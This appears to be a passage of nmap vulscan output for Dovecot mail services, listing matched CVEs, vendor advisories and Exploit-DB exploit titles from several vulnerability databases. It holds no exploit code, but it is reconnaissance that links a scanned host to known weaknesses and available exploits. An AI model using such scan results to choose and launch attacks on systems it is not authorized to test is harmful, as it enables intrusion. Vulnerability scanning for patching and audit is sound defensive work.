11737| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
11738| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
11739| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
11740| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
11741| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
11742| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
11743| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
11744| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
11745| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
11746| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
11747| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
11748| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
11749| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
11750| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
11751| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
11752| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
11753| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
11754| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
11755| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
11756| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
11757| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
11758| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
11759| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
11760| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
11761| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
11762| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
11763| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
11764| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
11765|
11766| SecurityFocus - https://www.securityfocus.com/bid/:
11767| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
11768| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
11769| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
11770| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
11771| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
11772| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
11773| [67306] Dovecot Denial of Service Vulnerability
11774| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
11775| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
11776| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
11777| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
11778| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
11779| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
11780| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
11781| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
11782| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
11783| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
11784| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
11785| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
11786| [39838] tpop3d Remote Denial of Service Vulnerability
11787| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
11788| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
11789| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
11790| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
11791| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
11792| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
11793| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
11794| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
11795| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
11796| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
11797| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
11798| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
11799| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
11800| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
11801| [17961] Dovecot Remote Information Disclosure Vulnerability
11802| [16672] Dovecot Double Free Denial of Service Vulnerability
11803| [8495] akpop3d User Name SQL Injection Vulnerability
11804| [8473] Vpop3d Remote Denial Of Service Vulnerability
11805| [3990] ZPop3D Bad Login Logging Failure Vulnerability
11806| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
11807|
11808| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11809| [86382] Dovecot POP3 Service denial of service
11810| [84396] Dovecot IMAP APPEND denial of service
11811| [80453] Dovecot mail-search.c denial of service
11812| [71354] Dovecot SSL Common Name (CN) weak security
11813| [67675] Dovecot script-login security bypass
11814| [67674] Dovecot script-login directory traversal
11815| [67589] Dovecot header name denial of service
11816| [63267] Apple Mac OS X Dovecot information disclosure
11817| [62340] Dovecot mailbox security bypass
11818| [62339] Dovecot IMAP or POP3 denial of service
11819| [62256] Dovecot mailbox security bypass
11820| [62255] Dovecot ACL entry security bypass
11821| [60639] Dovecot ACL plugin weak security
11822| [57267] Apple Mac OS X Dovecot Kerberos security bypass
11823| [56763] Dovecot header denial of service
11824| [54363] Dovecot base_dir privilege escalation
11825| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
11826| [46323] Dovecot dovecot.conf information disclosure
11827| [46227] Dovecot message parsing denial of service
11828| [45669] Dovecot ACL mailbox security bypass
11829| [45667] Dovecot ACL plugin rights security bypass
11830| [41085] Dovecot TAB characters authentication bypass
11831| [41009] Dovecot mail_extra_groups option unauthorized access
11832| [39342] Dovecot LDAP auth cache configuration security bypass
11833| [35767] Dovecot ACL plugin security bypass
11834| [34082] Dovecot mbox-storage.c directory traversal
11835| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
11836| [26578] Cyrus IMAP pop3d buffer overflow
11837| [26536] Dovecot IMAP LIST information disclosure
11838| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
11839| [24709] Dovecot APPEND command denial of service
11840| [13018] akpop3d authentication code SQL injection
11841| [7345] Slackware Linux imapd and ipop3d core dump
11842| [6269] imap, ipop2d and ipop3d buffer overflows
11843| [5923] Linuxconf vpop3d symbolic link
11844| [4918] IPOP3D, Buffer overflow attack
11845| [1560] IPOP3D, user login successful
11846| [1559] IPOP3D user login to remote host successful
11847| [1525] IPOP3D, user logout
11848| [1524] IPOP3D, user auto-logout
11849| [1523] IPOP3D, user login failure
11850| [1522] IPOP3D, brute force attack
11851| [1521] IPOP3D, user kiss of death logout
11852| [418] pop3d mktemp creates insecure temporary files
11853|
11854| Exploit-DB - https://www.exploit-db.com:
11855| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
11856| [23053] Vpop3d Remote Denial of Service Vulnerability
11857| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
11858| [11893] tPop3d 1.5.3 DoS
11859| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
11860| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
11861| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
11862| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
11863|
11864| OpenVAS (Nessus) - http://www.openvas.org:
11865| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
11866| [901025] Dovecot Version Detection
11867| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
11868| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
11869| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
11870| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
11871| [870607] RedHat Update for dovecot RHSA-2011:0600-01
11872| [870471] RedHat Update for dovecot RHSA-2011:1187-01
11873| [870153] RedHat Update for dovecot RHSA-2008:0297-02
11874| [863272] Fedora Update for dovecot FEDORA-2011-7612
11875| [863115] Fedora Update for dovecot FEDORA-2011-7258
11876| [861525] Fedora Update for dovecot FEDORA-2007-664
11877| [861394] Fedora Update for dovecot FEDORA-2007-493
11878| [861333] Fedora Update for dovecot FEDORA-2007-1485
11879| [860845] Fedora Update for dovecot FEDORA-2008-9202
11880| [860663] Fedora Update for dovecot FEDORA-2008-2475
11881| [860169] Fedora Update for dovecot FEDORA-2008-2464
11882| [860089] Fedora Update for dovecot FEDORA-2008-9232
11883| [840950] Ubuntu Update for dovecot USN-1295-1
11884| [840668] Ubuntu Update for dovecot USN-1143-1
11885| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
11886| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
11887| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
11888| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
11889| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
11890| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
11891| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
11892| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
11893| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
11894| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
11895| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
11896| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
11897| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
11898| [70259] FreeBSD Ports: dovecot
11899| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
11900| [66522] FreeBSD Ports: dovecot
11901| [65010] Ubuntu USN-838-1 (dovecot)
11902| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
11903| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
11904| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
11905| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
11906| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
11907| [62854] FreeBSD Ports: dovecot-managesieve
11908| [61916] FreeBSD Ports: dovecot
11909| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
11910| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
11911| [60528] FreeBSD Ports: dovecot
11912| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
11913| [60089] FreeBSD Ports: dovecot
11914| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
11915| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
11916|
11917| SecurityTracker - https://www.securitytracker.com:
11918| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
11919| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
11920| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
11921|
11922| OSVDB - http://www.osvdb.org:
11923| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
11924| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
11925| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
11926| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
11927| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
11928| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
11929| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
11930| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
11931| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
11932| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
11933| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
11934| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
11935| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
11936| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
11937| [66113] Dovecot Mail Root Directory Creation Permission Weakness
11938| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
11939| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
11940| [66110] Dovecot Multiple Unspecified Buffer Overflows
11941| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
11942| [64783] Dovecot E-mail Message Header Unspecified DoS
11943| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
11944| [62796] Dovecot mbox Format Email Header Handling DoS
11945| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
11946| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
11947| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
11948| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
11949| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
11950| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
11951| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
11952| [43137] Dovecot mail_extra_groups Symlink File Manipulation
11953| [42979] Dovecot passdbs Argument Injection Authentication Bypass
11954| [39876] Dovecot LDAP Auth Cache Security Bypass
11955| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
11956| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
11957| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
11958| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
11959| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
11960| [23281] Dovecot imap/pop3-login dovecot-auth DoS
11961| [23280] Dovecot Malformed APPEND Command DoS
11962| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
11963| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
11964| [5857] Linux pop3d Arbitrary Mail File Access
11965| [2471] akpop3d username SQL Injection
11966|_
11967143/tcp open imap Dovecot imapd
11968| vulscan: VulDB - https://vuldb.com:
11969| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
11970| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
11971| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
11972| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
11973| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
11974| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
11975| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
11976| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
11977| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
11978| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
11979| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
11980| [69835] Dovecot 2.2.0/2.2.1 denial of service
11981| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
11982| [65684] Dovecot up to 2.2.6 unknown vulnerability
11983| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
11984| [63692] Dovecot up to 2.0.15 spoofing
11985| [7062] Dovecot 2.1.10 mail-search.c denial of service
11986| [59792] Cyrus IMAPd 2.4.11 weak authentication
11987| [57517] Dovecot up to 2.0.12 Login directory traversal
11988| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
11989| [57515] Dovecot up to 2.0.12 Crash denial of service
11990| [54944] Dovecot up to 1.2.14 denial of service
11991| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
11992| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
11993| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
11994| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
11995| [53277] Dovecot up to 1.2.10 denial of service
11996| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
11997| [45256] Dovecot up to 1.1.5 directory traversal
11998| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
11999| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
12000| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
12001| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
12002| [40356] Dovecot 1.0.9 Cache unknown vulnerability
12003| [38222] Dovecot 1.0.2 directory traversal
12004| [37927] Ipswitch Ipswitch Collaboration Suite up to 2006.1 IMAP Service imapd32.exe memory corruption
12005| [36376] Dovecot up to 1.0.x directory traversal
12006| [35759] Atrium MERCUR IMAPD IMAP4 mcrimap4.exe memory corruption
12007| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
12008|
12009| MITRE CVE - https://cve.mitre.org:
12010| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
12011| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
12012| [CVE-2011-3481] The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.
12013| [CVE-2011-3372] imap/nntpd.c in the NNTP server (nntpd) for Cyrus IMAPd 2.4.x before 2.4.12 allows remote attackers to bypass authentication by sending an AUTHINFO USER command without sending an additional AUTHINFO PASS command.
12014| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
12015| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
12016| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
12017| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
12018| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
12019| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
12020| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
12021| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
12022| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
12023| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
12024| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
12025| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
12026| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
12027| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
12028| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
12029| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
12030| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
12031| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
12032| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
12033| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
12034| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
12035| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
12036| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
12037| [CVE-2007-5740] The format string protection mechanism in IMAPD for Perdition Mail Retrieval Proxy 1.17 and earlier allows remote attackers to execute arbitrary code via an IMAP tag with a null byte followed by a format string specifier, which is not counted by the mechanism.
12038| [CVE-2007-5018] Stack-based buffer overflow in IMAPD in Mercury/32 4.52 allows remote authenticated users to execute arbitrary code via a long argument in a SEARCH ON command. NOTE: this issue might overlap with CVE-2004-1211.
12039| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
12040| [CVE-2007-3925] Multiple buffer overflows in the IMAP service (imapd32.exe) in Ipswitch IMail Server 2006 before 2006.21 allow remote authenticated users to execute arbitrary code via the (1) Search or (2) Search Charset command.
12041| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
12042| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
12043| [CVE-2007-1579] Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
